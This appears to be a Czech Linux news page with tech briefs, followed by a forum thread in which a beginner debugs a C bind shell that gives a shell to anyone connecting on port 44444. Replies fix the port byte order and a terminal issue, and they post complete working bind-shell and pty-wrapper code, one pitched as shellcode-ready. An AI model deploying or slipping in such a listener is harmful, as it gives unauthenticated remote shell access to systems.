Steve Jobs a superpočítač Cray-1 budou vyobrazeny na pamětních jednodolarových mincích vyražených v příštím roce v rámci série Americká inovace. Série má 57 mincí, tj. 57 inovací. Poslední 4 mince budou vyraženy v roce 2032.
Byl zveřejněn průběžně aktualizovaný program konference OpenAlt 2025 o otevřeném softwaru a datech, IT bezpečnosti, DIY a IoT. Konference proběhne o víkendu 1. a 2. listopadu v prostorách FIT VUT v Brně. Vstup je zdarma.
Senát včera opětovně nepřijal návrh ústavního zákona, který měl do Listiny základních práv a svobod zakotvit právo občanů platit v hotovosti nebo být off-line. Návrh předložila skupina senátorů již v roce 2023. Senát dnes návrh neschválil, ale ani nezamítl. Pokud by ho přijal, dostala by ho k projednání Sněmovna a vyjádřila by se k němu vláda.
V programovacím jazyce Go naprogramovaná webová aplikace pro spolupráci na zdrojových kódech pomocí gitu Forgejo byla vydána ve verzi 13.0 (Mastodon). Forgejo je fork Gitei.
Společnost Eclypsium se na svém blogu rozepsala o bezpečnostním problému počítačů Framework. Jedná se o zranitelnost v UEFI umožňující útočníkům obejít Secure Boot.
Editor kódů Zed (Wikipedie) po macOS a Linuxu s verzí 0.208.4 už běží také ve Windows.
Apple dnes představil 14palcový MacBook Pro, iPad Pro a Apple Vision Pro s novým čipem M5.
Debian pro mobilní zařízení Mobian (Wikipedie) byl vydán ve verzi 13 Trixie. Nová stabilní verze je k dispozici pro PINE64 PinePhone, PinePhone Pro a PineTab, Purism Librem 5, Google Pixel 3a a 3a XL, OnePlus 6 a 6T a Xiaomi Pocophone F1.
Operátor O2 představil tarif Datamanie 1200 GB . Nový tarif přináší 1200 GB dat s neomezenou 5G rychlostí, a také možnost neomezeného volání do všech sítí za 15 Kč na den. Při roční variantě předplatného zákazníci získají po provedení jednorázové platby celou porci dat najednou a mohou je bezstarostně čerpat kdykoli během roku. Do 13. listopadu jej O2 nabízí za zvýhodněných 2 988 Kč. Při průměrné spotřebě tak 100 GB dat vychází na 249 Kč měsíčně.
Byly publikovány informace o útoku na zařízení s Androidem pojmenovaném Pixnapping Attack (CVE-2025-48561). Aplikace může číst citlivá data zobrazovaná jinou aplikací. V demonstračním videu aplikace čte 2FA kódy z Google Authenticatoru.
Dobry den,
mam takovyto jednoduchy bindshell napsany v C:
www.qg.ic.cz/a/bindshell.c
Podle me by mel po spusteni fungovat tak, ze bude cekat na portu 44444 a po pripojeni (treba pres telnet) mi preda shell. Narazil jsem vsak na dva problemy:
Spustim program
$ ./bindshell
Pokusim se pripojit na port 44444:
$ telnet localhost 44444 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused
Program neposloucha na portu 44444, divne, podivam se tedy pres nmap, kde ve skutecnosti visi:
$ sudo nmap -sS -p1-65000 localhost Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-07 13:03 CET Interesting ports on localhost.localdomain (127.0.0.1): Not shown: 64997 closed ports PORT STATE SERVICE 40109/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:
$ telnet localhost 40109 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. ls : command not found id : command not found
Nemam shell, pouze "visim" v konzoli. Proc? V sitovem programovani jsem zacatecnik, muze mi prosim nekdo tyto dva jevy objasnit? Budu moc vdecny.
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:
man htons
Nemam shell, pouze "visim" v konzoli. Proc?
Tipuju, že shell nedostal proměnné prostředí (posl. parametr execve
) - především $PATH
a tudíž netuší, kde má hledat binárky.
BTW - argv[0] není cesta, ale pouze basename (tj. spouštět stylem execve("/bin/sh", {"sh", NULL}, environ)
).
Na htons jsem uplne zapomnel, dekuji. Porty se uz prirazuji korektne. Program jsem tedy upravil takto:
www.qg.ic.cz/a/bindshell.c
Ale problem s "command not found" stale pretrvava:/
Ale problem s "command not found" stale pretrvava:/
Pokud se přidá parametr -i
pro interaktivní shell, tak mi to běhá (ale dost dobře nechápu proč to bez toho nefunguje a proč si myslí, že argv[0]
je ''
).
\r
taky zpusobuje iluzi prazdneho jmena tim, ze presouva kurzor na zacatek radku a dalsi vypisovany text prepisuje ten puvodni. Pri pouziti delsiho jmena to je hezky videt."ABCDEFGHIJKLMNOPQRSTUVWXYZ"
a zadam prikaz "id"
, ktery telnet posle jako "id\r"
, tak shell v mem pripade vypisuje chybu:ABCDEFGHIJKLMNOPQRSTUVWXYZ: line 1: id\r: command not found\n
: command not foundTUVWXYZ: line 1: id
Dekuji, pomohlo to, program jsem tedy upravil, ted uz ma jen jednu mouchu:
$ nc localhost 44444 sh: no job control in this shell sh-3.2$
Jak se prosim zbavim te hlasky "no job control in this shell"
Tak jsem si vsiml, ze tu hlasku to vypisuje pouze pokud bash volam takto:
execle("/bin/bash", "/bin/bash", "-i", NULL, envp);
Pokud ho zavolam takto (bez parametru -i):
execle("/bin/bash", "/bin/bash", NULL, envp);
je to OK. Ja bych tam ten prompt ale potreboval, nenapada vas jak toho dosahnout?
A je nejaka moznost jak mu ten terminal alokovat i kdyz pouzivam interaktivni rezim? Jednoduse zabranit vypisu te hlasky - nevypada to tam pekne.
man 7 pty
man posix_openpt
A jakym zpusobem to zapomponovat do toho programu? Ta funkce vraci file describtor a ten pak presmeruju do toho socketu stejne jako to delam se stdin, stdout a stderr?
Ano, a bash připojíte na slave.
Jaky slave?
Omlouvam se, asi jsem slepy, ale tady:
man posix_openpt
v sekci return value, je ze ta funkce vraci "a non-negative file descriptor which is the lowest numbered unused descriptor", coz je jeden fd. Kde tedy sezenu ten druhy?
$ man pts ... Unix 98 pseudo-terminals An unused Unix 98 pseudo-terminal master is opened by calling posix_openpt(3). (This function opens the mas‐ ter clone device, /dev/ptmx; see pts(4).) After performing any program-specific initializations, changing the ownership and permissions of the slave device using grantpt(3), and unlocking the slave using unlockpt(3)), the corresponding slave device can be opened by passing the name returned by ptsname(3) in a call to open(2). ...
Tak ja uz se v tom teda nejak nevyznam:-/ Muze mi prosim nejaka dobra duse poradit tak vse vyse zminene naroubuji do tohoto kodu?
... // redirect dup2(sock2, 0); dup2(sock2, 1); // execute execle("/bin/bash", "/bash", "-i", NULL, envp);
Zhruba jde o to, že až otevřete ten terminál, tak vytvoříte nový proces, ve kterém na slave toho terminálu píchnete ten shell a v původním procesu budete přesypávat data z masteru do socketu a zpátky. Není to nic složitého, ale psát to za vás nikdo nebude. Na internetu se válí spousta dokumentace a kódu pro inspiraci.
man fork, wait, select, write/read(/send/recv), ...
Pak se taky možná dostanete k signálům pro kontrolu terminálu/procesu a jejich předávání z klienta a buď se na to vykašlete, nebo budete o kus chytřejší :)
forkpty
, tak se můžete inspirovat. Případne můžou pánové šťouralové vylepšit.
static void run_terminal(int socket) { pid_t p, pp; int m; struct winsize ws = { .ws_row = 25, .ws_col = 80, .ws_xpixel = 0, .ws_ypixel = 0 }; p = forkpty(&m, NULL, NULL, &ws); if (p < 0) { error("forkpty"); close(socket); close(m); return; } if (p > 0) { pp = fork(); if (pp < 0) { error("fork"); close(socket); close(m); return; } if (pp > 0) { close(socket); close(m); return; } close(listen_socket); say("entering copy loop"); copy_loop(m, m, socket, socket); say("copy loop finished"); kill(p, 1); exit(0); } else { close(listen_socket); close(socket); close(m); say("spawning shell"); execl("/bin/bash", "bash", "-i", "-l", NULL); bail("execl"); } }
Skoro mě napadá otázka, na jaké škole se dávají takovéhle úkoly?
3. telnet do radku pridava \r.Jo, to je ten jednoduchý důvod
Ahoj ja pouzivam tento kod - je kratsi a ve vysledku i uspornejsi jako shellkod:
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc,cli;
struct sockaddr_in serv_addr;
int main(){
serv_addr.sin_family=2;
serv_addr.sin_addr.s_addr=0;
serv_addr.sin_port=0x9CAD; // Toto je to tvoje cislo portu 44444 zapsane v hex a prevracene - cili klasicky --> 0xAD9C ---> AD|9C --> 0x9CAD
soc=socket(2,1,0);
bind(soc,(struct sockaddr *)&serv_addr,0x10);
listen(soc,1);
cli=accept(soc,0,0);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execve("/bin/sh",0,0);
}
jinak doporucuji namisto telnet pouzit nc cili:
nc localhost 44444
soc=socket(2,1,0);
atd.) je cesta do pekel. Ten původní kód je přehlednější a nepřijde mi o tolik delší.
Tiskni
Sdílej: